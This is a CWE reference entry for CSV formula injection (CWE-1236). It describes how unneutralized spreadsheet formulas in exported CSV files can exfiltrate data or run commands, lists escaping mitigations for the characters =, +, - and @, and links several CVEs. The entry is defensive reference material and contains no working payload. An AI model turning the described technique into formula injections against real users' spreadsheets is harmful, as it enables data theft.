BaseIncomplete
CWE-1236Improper Neutralization of Formula Elements in a CSV File
Category: other
Description
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
Common consequences· 1
- Confidentiality — Read Application Data, Execute Unauthorized Code or CommandsAttackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.
Potential mitigations· 3
- [Implementation]When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
- [Implementation]If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.
- [Architecture and Design]Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
References
(incoming)9
| Type | Target | Confidence | Tier |
|---|---|---|---|
| Vulnerability | CVE-2025-14229cve-2025-14229 | 0% | live |
| Vulnerability | CVE-2025-4546cve-2025-4546 | 0% | live |
| Vulnerability | CVE-2025-50572cve-2025-50572 | 0% | live |
| Vulnerability | CVE-2025-54752cve-2025-54752 | 0% | live |
| Vulnerability | CVE-2025-55745cve-2025-55745 | 0% | live |
| Vulnerability | CVE-2025-56267cve-2025-56267 | 0% | live |
| Vulnerability | CVE-2026-23873cve-2026-23873 | 0% | live |
| Vulnerability | CVE-2026-31049cve-2026-31049 | 0% | live |
| Vulnerability | CVE-2026-35157cve-2026-35157 | 0% | live |
Related by meaning· 6
Nearest entities by semantic similarity across the cs-graph corpus.